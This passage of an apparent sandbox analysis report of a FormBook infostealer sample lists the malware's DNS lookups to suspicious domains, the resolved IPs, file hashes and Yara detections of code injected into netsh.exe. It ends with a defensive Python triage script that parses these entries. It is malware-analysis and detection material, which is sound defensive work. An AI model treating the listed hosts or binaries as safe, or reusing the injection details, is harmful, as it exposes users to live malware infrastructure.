                                                                                                    May 2, 2024 08:25:19.747693062 CEST53514231.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:33.814400911 CEST4966253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:34.013406992 CEST53496621.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:51.518388987 CEST6130853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:51.734960079 CEST53613081.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:05.378520966 CEST6490953192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:05.568423986 CEST53649091.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:19.580396891 CEST5200153192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:20.311863899 CEST53520011.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:36.080804110 CEST6425753192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:36.639506102 CEST53642571.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:51.503310919 CEST5488353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:52.157618999 CEST53548831.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:07.446336031 CEST5517453192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:07.570497036 CEST53551741.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:15.830028057 CEST6472853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:16.118583918 CEST53647281.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:30.429325104 CEST6103553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:30.992764950 CEST53610351.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:39.048943996 CEST6009253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:39.328984022 CEST53600921.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:57.249764919 CEST5742353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:57.446818113 CEST53574231.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 08:24:42.305643082 CEST | 192.168.2.4 | 1.1.1.1 | 0xf080 | Standard query (0) | www.vavada-band.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:00.439603090 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb70 | Standard query (0) | www.bettaroom.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:18.798521042 CEST | 192.168.2.4 | 1.1.1.1 | 0xa6af | Standard query (0) | www.dhleba51.ru | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:33.814400911 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbd3 | Standard query (0) | www.dainikmirpur.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:51.518388987 CEST | 192.168.2.4 | 1.1.1.1 | 0x2cc1 | Standard query (0) | www.whirledairlines.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:05.378520966 CEST | 192.168.2.4 | 1.1.1.1 | 0x31a | Standard query (0) | www.quantummquest.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:19.580396891 CEST | 192.168.2.4 | 1.1.1.1 | 0x9a84 | Standard query (0) | www.yamiyasheec.online | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:36.080804110 CEST | 192.168.2.4 | 1.1.1.1 | 0xb152 | Standard query (0) | www.applesolve.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:51.503310919 CEST | 192.168.2.4 | 1.1.1.1 | 0x839a | Standard query (0) | www.xxaiai.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:07.446336031 CEST | 192.168.2.4 | 1.1.1.1 | 0x5260 | Standard query (0) | www.vaesen.net | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:15.830028057 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6b5 | Standard query (0) | www.dk48.lol | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:30.429325104 CEST | 192.168.2.4 | 1.1.1.1 | 0x7837 | Standard query (0) | www.cluird.cloud | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:39.048943996 CEST | 192.168.2.4 | 1.1.1.1 | 0xa81d | Standard query (0) | www.cucuzeus88.store | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.249764919 CEST | 192.168.2.4 | 1.1.1.1 | 0xee7b | Standard query (0) | www.bnbuotqakx.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 08:24:43.243988991 CEST | 1.1.1.1 | 192.168.2.4 | 0xf080 | No error (0) | www.vavada-band.ru | vavada-band.ru | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:24:43.243988991 CEST | 1.1.1.1 | 192.168.2.4 | 0xf080 | No error (0) | vavada-band.ru | | 148.251.36.121 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:01.043719053 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb70 | No error (0) | www.bettaroom.ru | | 194.58.112.173 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:19.747693062 CEST | 1.1.1.1 | 192.168.2.4 | 0xa6af | No error (0) | www.dhleba51.ru | | 195.24.68.5 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:34.013406992 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbd3 | No error (0) | www.dainikmirpur.com | dainikmirpur.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:25:34.013406992 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbd3 | No error (0) | dainikmirpur.com | | 192.250.235.36 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:25:51.734960079 CEST | 1.1.1.1 | 192.168.2.4 | 0x2cc1 | No error (0) | www.whirledairlines.com | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:05.568423986 CEST | 1.1.1.1 | 192.168.2.4 | 0x31a | No error (0) | www.quantummquest.top | | 203.161.50.127 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:20.311863899 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a84 | No error (0) | www.yamiyasheec.online | yamiyasheec.online | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:26:20.311863899 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a84 | No error (0) | yamiyasheec.online | | 119.18.54.116 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:36.639506102 CEST | 1.1.1.1 | 192.168.2.4 | 0xb152 | No error (0) | www.applesolve.com | applesolve.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:26:36.639506102 CEST | 1.1.1.1 | 192.168.2.4 | 0xb152 | No error (0) | applesolve.com | | 188.116.38.155 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:52.157618999 CEST | 1.1.1.1 | 192.168.2.4 | 0x839a | No error (0) | www.xxaiai.top | | 108.186.8.158 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:07.570497036 CEST | 1.1.1.1 | 192.168.2.4 | 0x5260 | Name error (3) | www.vaesen.net | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:16.118583918 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6b5 | No error (0) | www.dk48.lol | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:16.118583918 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6b5 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:30.992764950 CEST | 1.1.1.1 | 192.168.2.4 | 0x7837 | Name error (3) | www.cluird.cloud | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:39.328984022 CEST | 1.1.1.1 | 192.168.2.4 | 0xa81d | No error (0) | www.cucuzeus88.store | cucuzeus88.store | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:39.328984022 CEST | 1.1.1.1 | 192.168.2.4 | 0xa81d | No error (0) | cucuzeus88.store | | 153.92.8.41 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.446818113 CEST | 1.1.1.1 | 192.168.2.4 | 0xee7b | No error (0) | www.bnbuotqakx.shop | bnbuotqakx.shop | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:57.446818113 CEST | 1.1.1.1 | 192.168.2.4 | 0xee7b | No error (0) | bnbuotqakx.shop | | 101.99.93.157 | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 08:23:52
Start date: 02/05/2024
Path: C:\Users\user\Desktop\yZcecBUXN7.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\yZcecBUXN7.exe"
Imagebase: 0x6d0000
File size: 631'808 bytes
MD5 hash: 9CD48F0D93C28AE6559409DE23414554
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 1
Start time: 08:23:52
Start date: 02/05/2024
Path: C:\Users\user\Desktop\yZcecBUXN7.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\yZcecBUXN7.exe"
Imagebase: 0x690000
File size: 631'808 bytes
MD5 hash: 9CD48F0D93C28AE6559409DE23414554
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:24:07
Start date: 02/05/2024
Path: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
Imagebase: 0x40000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 4
Start time: 08:24:12
Start date: 02/05/2024
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\netsh.exe"
Imagebase: 0x1560000
File size: 82'432 bytes
MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Target ID:7
                                                                                                    Start time:08:24:27
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:8
                                                                                                    Start time:08:24:50
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    No disassembly
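The process entries above are the FormBook injection chain as Joe Sandbox recorded it: netsh.exe (a signed Windows binary) carrying the payload in execute-writable memory, a renamed self-copy under Program Files (x86), and a later firefox.exe. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses the three entries exactly as printed above, decodes the .sdmp dump names and flags the indicators a triage analyst would check by hand. The dump-name field layout used here (field 0 = Target ID, field 3 = region base address, field 4 = page protection, field 6 = region type) is inferred from the values on this page and is an assumption, as is the random-directory heuristic; the protection and region-type constants are the standard winnt.h values.

```python
"""Triage the process entries of a Joe Sandbox report (added example, not Joe Security code)."""
import re
from dataclasses import dataclass

# Standard winnt.h memory constants, used to decode the dump-name fields below.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}  # the PAGE_EXECUTE* family

# Sample input: the three complete entries from the report above (Target IDs 4, 7, 8).
REPORT = r"""
Target ID:4
Path:C:\Windows\SysWOW64\netsh.exe
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:false

Target ID:7
Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:false

Target ID:8
Path:C:\Program Files\Mozilla Firefox\firefox.exe
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has exited:true
"""


@dataclass
class Dump:
    rule: str
    target_id: int
    base: int
    protect: int
    mem_type: int


def parse_sdmp(rule, name):
    """Split a *.sdmp name into its eight dotted hex fields.

    Joe Sandbox does not document the layout; the mapping used here is an
    assumption inferred from the report: field 0 is the Target ID, field 3 the
    region base address, field 4 the page protection and field 6 the region
    type. The other fields are left uninterpreted.
    """
    if not name.endswith(".sdmp"):
        raise ValueError(f"unexpected dump name: {name}")
    parts = name[:-len(".sdmp")].split(".")
    if len(parts) != 8 or not all(re.fullmatch(r"[0-9A-Fa-f]+", p) for p in parts):
        raise ValueError(f"unexpected dump name: {name}")
    f = [int(p, 16) for p in parts]
    return Dump(rule, f[0], f[3], f[4], f[6])


def parse_entries(text):
    """Turn 'Key:value' process entries (as printed in the report) into dicts."""
    procs, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("• Rule:"):
            m = re.search(r"Rule: (\S+), .*Source: (\S+\.sdmp)", line)
            cur["dumps"].append(parse_sdmp(m.group(1), m.group(2)))
            continue
        key, _, val = line.partition(":")  # values may themselves contain ':'
        if key == "Target ID":
            cur = {"id": int(val), "dumps": []}
            procs.append(cur)
        elif cur is not None:
            cur[key] = val.strip()
    return procs


def triage(procs):
    """Return (target_id, category, detail) findings for the injection chain."""
    findings = []
    for p in procs:
        path = p.get("Path", "")
        low = path.lower()
        for d in p["dumps"]:
            # A Yara hit in executable memory that is not a mapped image means the
            # payload was written at run time rather than loaded from disk.
            if d.protect in EXECUTABLE and d.mem_type != 0x1000000:
                where = (f"{d.rule} in {PAGE_PROTECT.get(d.protect, hex(d.protect))} "
                         f"{MEM_TYPE.get(d.mem_type, hex(d.mem_type))} region at {d.base:#x}")
                cat = ("injected code in system binary" if low.startswith("c:\\windows\\")
                       else "executable payload outside image")
                findings.append((p["id"], cat, where))
        # Heuristic (assumption): a vendor directory that is one long run of letters
        # with no spaces is typical of a self-copy, not of an installed product.
        if re.match(r"c:\\program files( \(x86\))?\\([a-z]{24,})\\", low):
            findings.append((p["id"], "dropped copy under random-looking directory", path))
    return findings


if __name__ == "__main__":
    for tid, cat, detail in triage(parse_entries(REPORT)):
        print(f"target {tid}: {cat}: {detail}")
```

Run stand-alone it prints two hits for netsh.exe (both rules fire on the same PAGE_EXECUTE_READWRITE mapped region at 0xc00000, while the two PAGE_READWRITE private regions holding unpacked data are not flagged), three for the dropped copy, and nothing for firefox.exe, which has no Yara match in the report.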